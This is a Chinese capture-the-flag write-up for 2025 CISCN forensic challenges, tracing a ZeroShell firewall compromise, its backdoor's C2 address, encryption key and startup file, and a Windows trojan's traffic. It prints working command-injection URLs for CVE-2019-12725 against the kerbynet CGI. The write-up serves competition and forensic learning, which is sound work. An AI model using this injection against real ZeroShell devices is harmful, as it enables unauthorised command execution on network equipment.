2025年CISCNx长城杯初赛部分WriteUp

zeroshell_1

从数据包中找出攻击者利用漏洞开展攻击的会话(攻击者执行了一条命令),写出该会话中设置的flag, 结果提交形式:flag{xxxxxxxxx}

由题目可知flag应该是直接在流量中的,明文存储或者编码过,直接搜

image-20241215180059278

image-20241215180114819

zeroshell_2

2.通过漏洞利用获取设备控制权限,然后查找设备上的flag文件,提取flag文件内容,结果提交形式:flag{xxxxxxxxxx}

分析流量可知利用的漏洞是CVE-2019-12725

image-20241215180248887

image-20241215180412388

命令执行找flag文件

61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Afind / -name flag%0A

image-20241215180500515

cat

image-20241215180604523

zeroshell_3

3.找出受控机防火墙设备中驻留木马的外联域名或IP地址,结果提交形式:flag{xxxx},如flag{www.abc.com} 或 flag{16.122.33.44}

已知受害主机ip为61.139.2.100

过滤

ip.src == 61.139.2.100

分析发现与请求过202.115.89.103的8080端口

image-20241215180755887

丢微步查询发现有相关后门样本

image-20241215180859202

zeroshell_4

4.请写出木马进程执行的本体文件的名称,结果提交形式:flag{xxxxx},仅写文件名不加路径

上题ip的相关样本

image-20241215180942501

其中一个是.nginx

image-20241215181021432

靶机中也能查到

image-20241215181101657

zeroshell_5

5.请提取驻留的木马本体文件,通过逆向分析找出木马样本通信使用的加密密钥,结果提交形式:flag{xxxx}

利用漏洞配合bp,cat /Database/.nginx,base64保存结果得到

image-20241215193803700

解码丢入ida32

查看字符串可以找到ip,下面还有一串字符串

image-20241215192020402

跟进

image-20241215192231422

提交发现就是加密密钥

zeroshell_6

6.请写出驻留木马的启动项,注意写出启动文件的完整路径。结果提交形式:flag{xxxx},如flag{/a/b/c}

启动文件,文件内容肯定会包含这个.nignx

grep搜索,在var目录发现

61.139.2.100/cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Agrep -rl ".nginx" /var%0A

image-20241215181818632

cat

image-20241215181907521

WinFT_1

1、受控机木马的回连域名及ip及端口是(示例:flag{xxx.com:127.0.0.1:2333})

分析流量,发现有个exe

image-20241215182908339

域名:miscflvol.com,ip:192.168.116.130

火绒剑里也能看到

image-20241215183445095

端口:443

WinFT_2

2、受控机启动项中隐藏flag是

发现一直会有弹窗,应该是计划任务

image-20241215182410688

解码得到

image-20241215182652168

WinFT_5

5、分析流量,获得压缩包中得到答案

直接过滤flag

image-20241215192538726

追踪http流

image-20241215192604300

分析发现该zip存在两个文件,一个flag.txt,一个Everythin.zip,但是前段数据缺少,到流量中继续分析发现

image-20241215192720643

刚才的zip数据对应的是请求/server得到的内容

过滤http流,发现还请求了/client

image-20241215192855019

追踪http流

image-20241215192909399

正是缺少的头部

拼接后得到

image-20241215192943737

注释解码得到

image-20241215193006993

找了半天不知道是什么,用这个作为密码发现对了

image-20241215193038063

0%